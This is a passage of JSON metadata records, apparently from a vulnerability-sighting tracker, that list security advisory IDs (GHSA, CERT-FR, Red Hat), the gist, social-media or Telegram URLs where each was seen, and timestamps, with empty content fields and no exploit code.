"GHSA-4rv8-5cmm-2r22", "type": "seen", "source": "https://gist.github.com/alon710/b64eb8bf5447813639656d54741fea24", "content": "", "creation_timestamp": "2026-02-28T02:40:11.000000Z"}, {"uuid": "8745ce19-02b8-41e3-ae85-452ae03f3591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5C6J-R48X-RMVQ", "type": "seen", "source": "https://gist.github.com/alon710/d1eb861b7784463c434753842ee96c85", "content": "", "creation_timestamp": "2026-02-28T03:10:11.000000Z"}, {"uuid": "4ebdd7e6-c364-44c0-b2d0-99100c5daaae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-945p-3jhm-6rcp", "type": "seen", "source": "https://gist.github.com/alon710/43a4ce973e7deb9cb22c759bda6c4252", "content": "", "creation_timestamp": "2026-02-28T03:40:10.000000Z"}, {"uuid": "36f8b3f8-2cab-4dd1-a674-9e306a4f09a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8rr6-2qw5-pc7r", "type": "seen", "source": "https://gist.github.com/alon710/736755cc2599ea9d371fb4c02f1fbf3b", "content": "", "creation_timestamp": "2026-02-28T04:10:10.000000Z"}, {"uuid": "bda08c74-6a80-4a27-b243-6a16fe97e372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-J8CJ-HW74-64JV", "type": "seen", "source": "https://gist.github.com/alon710/5ac3748589d1670a9668e97918f21f24", "content": "", "creation_timestamp": "2026-02-28T06:10:10.000000Z"}, {"uuid": "20854e97-c7c1-49dd-b7b9-314726af8f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-j8cj-hw74-64jv", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfvlwzbbao24", "content": "", "creation_timestamp": "2026-02-28T06:29:32.564450Z"}, {"uuid": "a154b3f7-1d95-4763-83ab-8bb4d4da4820", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8p85-9qpw-fwgw", "type": "seen", "source": "https://gist.github.com/alon710/95873439d2452dafcf62d120f48408bf", "content": "", "creation_timestamp": "2026-02-28T06:40:11.000000Z"}, {"uuid": "8d15156f-ce93-4927-b60b-74d0677e7e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f2v5-7jq9-h8cg", "type": "seen", "source": "https://gist.github.com/alon710/8c701e4c3b2c6c36535c668dab067b3c", "content": "", "creation_timestamp": "2026-02-28T07:10:10.000000Z"}, {"uuid": "e29d2752-487f-4e05-8044-2f2f88a7b282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rchw-322g-f7rm", "type": "seen", "source": "https://gist.github.com/alon710/ad7fc02718b15a210a981448af582910", "content": "", "creation_timestamp": "2026-02-28T07:40:11.000000Z"}, {"uuid": "eabd8b3a-dbae-465c-a1fc-1ef7cc736662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FPG4-JHQR-589C", "type": "seen", "source": "https://gist.github.com/alon710/c9a9aad02e1c4d2d715228e3279389cd", "content": "", "creation_timestamp": "2026-02-28T08:10:11.000000Z"}, {"uuid": "d65a0e06-4c6e-4462-bb51-0c7c9e9086b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72hv-8253-57qq", "type": "seen", "source": "https://gist.github.com/alon710/dee93e535f0e6a9b2652c608faf07fe1", "content": "", "creation_timestamp": "2026-02-28T08:40:11.000000Z"}, {"uuid": "a4d9c71f-304c-4a79-9e44-3c2f6fa4c48d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rfjg-6m84-crj2", "type": "seen", "source": "https://gist.github.com/alon710/e6e1d06f45ead4fd6adc1a03157a349c", "content": "", "creation_timestamp": "2026-02-28T09:10:10.000000Z"}, {"uuid": "89a8667f-3411-4a42-adb8-7cdb767ddb42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q4jv-xwjx-37cp", "type": "seen", "source": "https://gist.github.com/alon710/d7d63782498b311cdc2ea84fbf51ebba", "content": "", "creation_timestamp": "2026-02-28T21:10:22.000000Z"}, {"uuid": "c8796fc6-12bb-4938-baa4-4911c8ff1cfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-386h-chg4-cfw9", "type": "seen", "source": "https://bsky.app/profile/dbt3.ch/post/3mfx55hqx722t", "content": "", "creation_timestamp": "2026-02-28T21:10:01.952429Z"}, {"uuid": "ff9ee926-9994-41e4-9b7b-0c298a52807c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h3h8-3v2v-rg7m", "type": "seen", "source": "https://gist.github.com/alon710/b9cbc8bb91819a5e8479c60ca815f5c4", "content": "", "creation_timestamp": "2026-03-01T01:10:21.000000Z"}, {"uuid": "8ce7e4e4-2d43-43e2-b80a-46a3388ea75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cpv7-q2wx-m8rw", "type": "seen", "source": "https://gist.github.com/alon710/6dff5aa5b78da9632648e4342c5b33c1", "content": "", "creation_timestamp": "2026-03-01T01:40:21.000000Z"}, {"uuid": "cb9fee00-a754-410d-ad21-8d9711c6e713", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vrj-wf7v-5wr7", "type": "seen", "source": "https://gist.github.com/alon710/74dba3e5da70d59374d9df1bc83c463e", "content": "", "creation_timestamp": "2026-03-01T02:10:22.000000Z"}, {"uuid": "50a7b918-f7a3-40e3-a25e-032fac62ca73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w878-f8c6-7r63", "type": "seen", "source": "https://gist.github.com/alon710/99efb0d74d514062b9d54ac7af70acf9", "content": "", "creation_timestamp": "2026-03-01T02:40:22.000000Z"}, {"uuid": "41cae5dc-11bd-4c0c-9e0b-00eef1286ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cwpp-325q-2cvp", "type": "seen", "source": "https://gist.github.com/alon710/50bb89929f5a073708371f4c768a5227", "content": "", "creation_timestamp": "2026-03-01T03:10:21.000000Z"}, {"uuid": "d377d43f-55e8-4fb2-bc31-be017638ed35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m3xh-9434-g336", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mfxsh6sxfc2z", "content": "", "creation_timestamp": "2026-03-01T03:31:16.574930Z"}, {"uuid": "bbf432ae-fb12-445e-8636-43cd6dde202c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jmh7-g254-2cq9", "type": "seen", "source": "https://gist.github.com/alon710/9f993a06ed7bab9401f4ef1661c6ed1f", "content": "", "creation_timestamp": "2026-03-01T03:40:22.000000Z"}, {"uuid": "34752d44-2825-4a25-8b6d-6aa109e2d263", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pfjf-5gxr-995x", "type": "seen", "source": "https://gist.github.com/alon710/794157ac4402be5b97d405f38441e2cb", "content": "", "creation_timestamp": "2026-03-01T04:10:22.000000Z"}, {"uuid": "103ebd47-bb54-4e60-924a-42d6d7cad504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-39mp-8hj3-5c49", "type": "seen", "source": "https://gist.github.com/alon710/c8483d13f0f8c89e0ba6e40695da8060", "content": "", "creation_timestamp": "2026-03-01T04:40:21.000000Z"}, {"uuid": "39fa0330-a703-41f4-a195-0359ebf2233b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6rxq-q92g-4rmf", "type": "seen", "source": "https://gist.github.com/alon710/7a893e251a88058a62af629d6e1695c0", "content": "", "creation_timestamp": "2026-03-01T05:40:22.000000Z"}, {"uuid": "0d4acf02-c1c2-4e67-8115-e60f23130f95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hx9w-f2w9-9g96", "type": "seen", "source": "https://gist.github.com/alon710/8322ecdb223d4bba4354b16de7a125f9", "content": "", "creation_timestamp": "2026-03-01T06:10:21.000000Z"}, {"uuid": "184b30df-e284-423d-a151-71308dc89a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xfx2-prg5-jq3g", "type": "seen", "source": "https://gist.github.com/alon710/748a43a550acf66c2103297189dfb986", "content": "", "creation_timestamp": "2026-03-01T07:10:22.000000Z"}, {"uuid": "56940bbb-0e8b-4462-90cb-0cb5a587810b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-xfx2-prg5-jq3g", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfy7s5omvb24", "content": "", "creation_timestamp": "2026-03-01T07:30:03.424049Z"}, {"uuid": "f924c2ca-8f87-438a-8f5e-43e1b13e9b57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xf7r-hgr6-v32p", "type": "seen", "source": "https://gist.github.com/alon710/4e7c76effa1548ba67f0464733eb7344", "content": "", "creation_timestamp": "2026-03-01T07:40:22.000000Z"}, {"uuid": "651ffa6f-f215-43d9-9c4f-4501edb50651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v52c-386h-88mc", "type": "seen", "source": "https://gist.github.com/alon710/8ab283edb74cdc48bd86d05f78d0166b", "content": "", "creation_timestamp": "2026-03-01T08:10:22.000000Z"}, {"uuid": "ea5a1eb3-a3ac-40ea-b3aa-6473c2432d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-528Q-4PGM-WVG2", "type": "seen", "source": "https://gist.github.com/alon710/60b711663355963d86d4c63986f8804a", "content": "", "creation_timestamp": "2026-03-01T11:10:33.000000Z"}, {"uuid": "21629768-96b6-46aa-8753-711defd10a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-009", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mg3dsgycpw2o", "content": "", "creation_timestamp": "2026-03-02T13:19:47.109797Z"}, {"uuid": "f49f966f-3d14-4b3b-bf52-72901ea00467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-009", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116159852900298733", "content": "", "creation_timestamp": "2026-03-02T13:38:16.774278Z"}, {"uuid": "dd5ab28f-dfd1-4a1d-a7ba-09971679f017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-009", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mg3etgtvxl2m", "content": "", "creation_timestamp": "2026-03-02T13:38:14.290487Z"}, {"uuid": "250534b7-f76d-4ca6-a329-43a914b16edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qppj-fm5r-hxr3", "type": "seen", "source": "https://gist.github.com/nagy/90607f86d8a7a0c2a6b37d48a5f75dfb", "content": "", "creation_timestamp": "2026-03-02T14:02:39.000000Z"}, {"uuid": "cef51d3b-bbf3-40f5-ac69-23736f203bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4374-p667-p6c8", "type": "seen", "source": "https://gist.github.com/nagy/90607f86d8a7a0c2a6b37d48a5f75dfb", "content": "", "creation_timestamp": "2026-03-02T14:02:39.000000Z"}, {"uuid": "1ad753c7-35fa-4c9a-86b5-5daa824bd0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6fw5-f8r9-fgfm", "type": "seen", "source": "https://gist.github.com/dims/bd766118ae32d646ea9f127ac51c3054", "content": "", "creation_timestamp": "2026-04-25T11:36:33.000000Z"}, {"uuid": "7479b9f5-74ff-4a31-a734-5a2a8db224ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C4QG-J8JG-42Q5", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkemho5wntb2", "content": "", "creation_timestamp": "2026-04-26T03:29:34.339141Z"}, {"uuid": "9466a3fc-cabd-491b-a2ee-45b9b35e5226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C4QG-J8JG-42Q5", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkf3fxawja22", "content": "", "creation_timestamp": "2026-04-26T07:57:04.322645Z"}, {"uuid": "e39d6fca-7543-41ab-80b9-d1f012eb9be2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gh5m-4m97-c95h", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mi3pb7a74u2q", "content": "", "creation_timestamp": "2026-03-28T03:35:16.744653Z"}, {"uuid": "3e368c80-73c1-4019-98e6-112d319fe826", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-h8r8-wccr-v5f2", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mi52llcjq72e", "content": "", "creation_timestamp": "2026-03-28T16:30:36.456365Z"}, {"uuid": "941d14fb-2e91-4ed5-af50-b42de4917bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "certfr-2026-act-013", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3midhnavsbi23", "content": "", "creation_timestamp": "2026-03-31T05:40:09.047015Z"}, {"uuid": "0b9f7182-40aa-4d1f-bc34-35cc6d067c38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-013", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3midslhyh4c23", "content": "", "creation_timestamp": "2026-03-31T08:56:00.649820Z"}, {"uuid": "e8d65881-723a-4de0-b8b7-7c36151d2e6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/mmansoor/dece5ba38f4a3cd8a81c08d3567bede4", "content": "", "creation_timestamp": "2026-03-31T11:58:22.000000Z"}, {"uuid": "187c042d-49a7-4a55-b728-0844dd457093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/mmansoor/4af1318fa3ba37c250137d15225b361f", "content": "", "creation_timestamp": "2026-03-31T12:50:50.000000Z"}, {"uuid": "234c644d-592d-4bc6-a7c8-a7b14e48daff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/david-brzozowski/409579b3efce959c08f80da453aac219", "content": "", "creation_timestamp": "2026-03-31T13:10:23.000000Z"}, {"uuid": "eaf357ff-757c-49ac-990e-d0e65656e8d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h6c2-x2m2-mwhf", "type": "seen", "source": "https://bsky.app/profile/ai-nerd.bsky.social/post/3miekzqjdw42a", "content": "", "creation_timestamp": "2026-03-31T16:13:29.600118Z"}, {"uuid": "e2e6d8d8-9228-4df2-9fbd-2f88245077cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35jh-r3h4-6jhm", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mif346qrs52s", "content": "", "creation_timestamp": "2026-03-31T21:01:11.012352Z"}, {"uuid": "03c9357b-ff6f-4cd3-8ebd-6a5b5f6835dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35jh-r3h4-6jhm", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mifw6dxnll2s", "content": "", "creation_timestamp": "2026-04-01T05:05:35.213746Z"}, {"uuid": "50d9b610-cf50-45e4-8fd7-b953ed75cfd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/unscripted/73513378e232d4e6a97be367008462f6", "content": "", "creation_timestamp": "2026-04-01T03:52:09.000000Z"}, {"uuid": "0925d95b-a265-476b-9ca3-e927d4f72c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://gist.github.com/robinbraemer/756b8b874ad7b7c0bff5f0b7499e66a5", "content": "", "creation_timestamp": "2026-04-01T12:01:13.000000Z"}, {"uuid": "5b68930d-f085-4799-8383-4914f566710d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2gmj-rpqf-pxvh", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/116329851348628122", "content": "", "creation_timestamp": "2026-04-01T14:11:04.610112Z"}, {"uuid": "3349fbec-dfa5-4b33-8010-1983963f3683", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-658g-p7jg-wx5g", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3miurcefzms2b", "content": "", "creation_timestamp": "2026-04-07T02:48:17.702895Z"}, {"uuid": "8b08db81-0410-4d87-8ded-0cfd736f994f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p5rh-vmhp-gvcw", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3miurceg26g22", "content": "", "creation_timestamp": "2026-04-07T02:48:17.198889Z"}, {"uuid": "177207e3-7b6a-4a02-a833-e2978675a3ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-015", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mivz5ulz6q2n", "content": "", "creation_timestamp": "2026-04-07T14:41:37.401387Z"}, {"uuid": "afd3afa4-352e-4923-b11f-982bf0fc764d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33qg-7wpp-89cq", "type": "seen", "source": "https://bsky.app/profile/getajobmike.ruby.social.ap.brid.gy/post/3miwjflst6ug2", "content": "", "creation_timestamp": "2026-04-07T19:32:20.075236Z"}, {"uuid": "23ce0cfa-9e9e-46b0-81da-c52da49e6073", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35jh-r3h4-6jhm", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3miwn6zjrp223", "content": "", "creation_timestamp": "2026-04-07T20:40:09.298759Z"}, {"uuid": "42a6efe7-602d-4692-bbf6-7fb35c6e16c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g3g9-5vj6-r3gj", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3miwp7a3ehh2w", "content": "", "creation_timestamp": "2026-04-07T21:16:05.669878Z"}, {"uuid": "35ee3e53-3512-4976-9d38-a9c1efaa96a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g3g9-5vj6-r3gj", "type": "seen", "source": "https://bsky.app/profile/nixpkgs-prs-bot.bsky.social/post/3miwyni3rwn2u", "content": "", "creation_timestamp": "2026-04-08T00:05:08.001637Z"}, {"uuid": "0cd96a96-de14-4291-bb4e-28aa50cdb82e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g3g9-5vj6-r3gj", "type": "seen", "source": "https://bsky.app/profile/nixpkgs-prs-bot.bsky.social/post/3miwynhvitm2u", "content": "", "creation_timestamp": "2026-04-08T00:05:05.120439Z"}, {"uuid": "7e5fe6e2-0c83-4686-93c1-20ee10d25916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2679-6mx9-h9xc", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mj4qrwhxfm2f", "content": "", "creation_timestamp": "2026-04-10T07:00:23.586003Z"}, {"uuid": "729c534c-095b-464c-a66e-299e5c0eab86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rqr9-jwwf-wxgj", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-2ea9cd48-339e9a3e45089926", "content": "", "creation_timestamp": "2026-04-10T14:32:10.395851Z"}, {"uuid": "2103f667-a395-459e-8a4f-b56db2075bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2fxp-43j9-pwvc", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-2ea9cd48-339e9a3e45089926", "content": "", "creation_timestamp": "2026-04-10T14:32:09.790695Z"}, {"uuid": "0979b45a-8b62-41ed-8690-ae424f1a2827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-78h2-9frx-2jm8", "type": "seen", "source": "https://gist.github.com/paulo-raca/8a16df3664952c9b185211298075c6ab", "content": "", "creation_timestamp": "2026-04-10T17:08:55.000000Z"}, {"uuid": "ddc9cc02-1a08-4424-a007-a7b397ba640c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RWR-C8HC-MJJ4", "type": "seen", "source": "Telegram/OYffpMdaBj2T2f8vD_3Xr2_N56biRnySAWVcO0fFYvIpjNs", "content": "", "creation_timestamp": "2026-01-02T21:57:38.000000Z"}, {"uuid": "643e1aeb-171e-40b3-a877-34e251d806aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0036", "type": "seen", "source": "Telegram/Ln-Tijs8Mrus1yJJyoZ6KmT82kic7N_Q3bIXfA3ucf5IWpQ", "content": "", "creation_timestamp": "2026-01-05T08:01:26.000000Z"}, {"uuid": "5540369d-9fed-40af-b3a7-6461e811f88d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0034", "type": "published-proof-of-concept", "source": "Telegram/t6YxizuttcmOMt4e3s_Y9UALO98h2j16YRSgOPpoTPjraT0", "content": "", "creation_timestamp": "2026-01-05T08:02:10.000000Z"}, {"uuid": "84ebc459-bd6a-44e4-bf9c-828353fbee0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0033", "type": "published-proof-of-concept", "source": "Telegram/t6YxizuttcmOMt4e3s_Y9UALO98h2j16YRSgOPpoTPjraT0", "content": "", "creation_timestamp": "2026-01-05T08:02:10.000000Z"}, {"uuid": "892c9187-b9b1-4042-a89f-628610b240d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQP9-R53C-3M9H", "type": "seen", "source": "Telegram/ClQlCkUK_g-41DnO-lFV9vjntTb0h6MDzDnf9KQOdYwqtyI", "content": "", "creation_timestamp": "2026-01-07T19:09:06.000000Z"}, {"uuid": "8d77829a-9cec-4c7f-8d05-f7989e314f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6X8-WH9V-6JXP", "type": "seen", "source": "Telegram/ClQlCkUK_g-41DnO-lFV9vjntTb0h6MDzDnf9KQOdYwqtyI", "content": "", "creation_timestamp": "2026-01-07T19:09:06.000000Z"}, {"uuid": "49a4c1fc-4aa2-426d-8523-cc1633208cd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", 